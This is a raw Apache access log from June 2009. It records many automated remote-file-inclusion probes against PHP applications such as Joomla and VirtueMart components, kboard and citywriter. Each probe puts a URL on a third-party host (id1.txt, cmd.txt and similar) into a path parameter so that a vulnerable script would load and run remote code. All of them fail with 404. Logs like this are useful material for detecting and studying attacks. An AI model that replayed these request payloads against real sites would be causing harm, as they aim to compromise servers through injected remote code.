72.36.134.234 - - [04/Jun/2009:05:37:27 -0500] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:05:37:27 -0500] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:05:37:27 -0500] "GET /logs/access_log.1228608000/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:05:38:51 -0500] "GET /logs/access_log.1228608000/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:05:38:51 -0500] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:05:38:51 -0500] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:05:39:04 -0500] "GET /logs/access_log.1232064000/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:05:39:04 -0500] "GET /logs/access_log.1229990400/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:05:39:17 -0500] "GET /logs/access_log.1228608000/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:05:39:17 -0500] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:05:39:17 -0500] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:05:39:27 -0500] "GET /logs/access_log.1228608000%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
64.38.12.194 - - [04/Jun/2009:05:40:36 -0500] "GET //index.php?cont=http://www.poisongame.altervista.org/cmd.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
74.53.70.114 - - [04/Jun/2009:05:43:01 -0500] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.53.70.114 - - [04/Jun/2009:05:43:01 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
74.53.70.114 - - [04/Jun/2009:05:43:02 -0500] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:43:50 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:43:50 -0500] "GET /logs/access_log.1240444800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:43:50 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:43:50 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:43:51 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:43:51 -0500] "GET /logs/access_log.1240444800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:43:55 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:43:56 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
74.53.70.114 - - [04/Jun/2009:05:44:11 -0500] "GET /logs/access_log.1238803200//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:45:24 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:45:25 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:45:27 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:45:27 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:45:27 -0500] "GET /logs/access_log.1241395200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:45:28 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:45:28 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:45:28 -0500] "GET /logs/access_log.1241395200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:05:45:29 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:48:55 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:48:55 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:48:55 -0500] "GET /logs/access_log.1241481600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:48:55 -0500] "GET /logs/access_log.1240790400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:50:08 -0500] "GET /logs/access_log.1241481600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:50:08 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:50:08 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 335 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:50:09 -0500] "GET /logs/access_log.1240790400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
168.143.19.89 - - [04/Jun/2009:05:54:53 -0500] "GET /logs/access_log.1240444800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:05:59:49 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:05:59:50 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:05:59:50 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:06:04:31 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:06:04:31 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:06:04:31 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:06:05:02 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:06:05:02 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:06:05:02 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:08:52 -0500] "GET /logs/access_log.1240444800//citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:08:52 -0500] "GET /logs/access_log.1240531200//citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:08:52 -0500] "GET //citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:08:52 -0500] "GET /logs//citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:06:09:37 -0500] "GET //skin/zero_vote/write.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:06:09:37 -0500] "GET /logs/access_log.1231718400//skin/zero_vote/write.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:06:09:37 -0500] "GET /logs//skin/zero_vote/write.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:09:47 -0500] "GET //citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:09:47 -0500] "GET /logs//citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:09:47 -0500] "GET /logs/access_log.1240444800//citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:09:47 -0500] "GET /logs/access_log.1240531200//citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:06:09:52 -0500] "GET /logs/access_log.1232064000//skin/zero_vote/write.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
220.181.7.97 - - [04/Jun/2009:06:09:59 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.251.225.77 - - [04/Jun/2009:06:10:14 -0500] "GET //skin/zero_vote/write.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:06:10:14 -0500] "GET /logs//skin/zero_vote/write.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:06:10:14 -0500] "GET /logs/access_log.1231718400//skin/zero_vote/write.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.251.225.77 - - [04/Jun/2009:06:10:31 -0500] "GET /logs/access_log.1232064000//skin/zero_vote/write.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:11:24 -0500] "GET /logs/access_log.1241654400//citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:13:07 -0500] "GET /logs/access_log.1241654400//citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:18:19 -0500] "GET //citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:18:19 -0500] "GET /logs//citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:18:19 -0500] "GET /logs/access_log.1240444800//citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:06:18:27 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
62.140.23.192 - - [04/Jun/2009:06:18:27 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
62.140.23.192 - - [04/Jun/2009:06:18:36 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.803"
62.140.23.192 - - [04/Jun/2009:06:18:36 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
201.232.54.48 - - [04/Jun/2009:06:18:58 -0500] "GET /logs/access_log.1240531200//citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:06:19:38 -0500] "GET /logs/access_log.1241654400//citywriter/head.php?path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:06:31:40 -0500] "GET /logs/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:06:31:40 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:06:31:40 -0500] "GET /errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
78.111.80.18 - - [04/Jun/2009:06:34:48 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:06:35:02 -0500] "GET /index2.php?x=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:06:35:02 -0500] "GET /logs/index2.php?x=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
69.50.197.106 - - [04/Jun/2009:06:35:07 -0500] "GET /logs/access_log.1241913600/index2.php?x=http://eurostrade.cn/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.80.195.34 - - [04/Jun/2009:06:37:29 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={B68BA26C-8540-4400-9996-C48F9D7E21E7}; SIMBAR=0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; IEMB3)"
218.149.85.37 - - [04/Jun/2009:06:38:06 -0500] "GET /errors.php?error=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:06:38:06 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:06:38:06 -0500] "GET /logs/errors.php?error=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
213.33.76.85 - - [04/Jun/2009:06:38:43 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.33.76.85 - - [04/Jun/2009:06:38:43 -0500] "GET /errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
213.33.76.85 - - [04/Jun/2009:06:38:43 -0500] "GET /logs/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:06:39:15 -0500] "GET /errors.php?error=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:06:39:15 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:06:39:16 -0500] "GET /logs/errors.php?error=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.149.85.37 - - [04/Jun/2009:06:39:35 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.249.66.6 - - [04/Jun/2009:06:39:52 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.6 - - [04/Jun/2009:06:39:52 -0500] "GET /logs/access_log.1135641600 HTTP/1.1" 200 1263 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.149.85.37 - - [04/Jun/2009:06:41:00 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.33.76.85 - - [04/Jun/2009:06:41:02 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:06:42:55 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:06:42:59 -0500] "GET /logs/access_log.1240444800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:06:43:00 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:06:44:16 -0500] "GET /logs/access_log.1240099200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:06:44:24 -0500] "GET /logs/access_log.1242000000//administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:06:44:24 -0500] "GET /logs//administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:06:44:25 -0500] "GET //administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
65.55.106.111 - - [04/Jun/2009:06:47:37 -0500] "GET /logs/access_log.1147305600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.106.67.146 - - [04/Jun/2009:06:50:04 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
87.106.67.146 - - [04/Jun/2009:06:50:04 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
213.189.9.11 - - [04/Jun/2009:06:50:31 -0500] "GET //citywriter/head.php?path=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
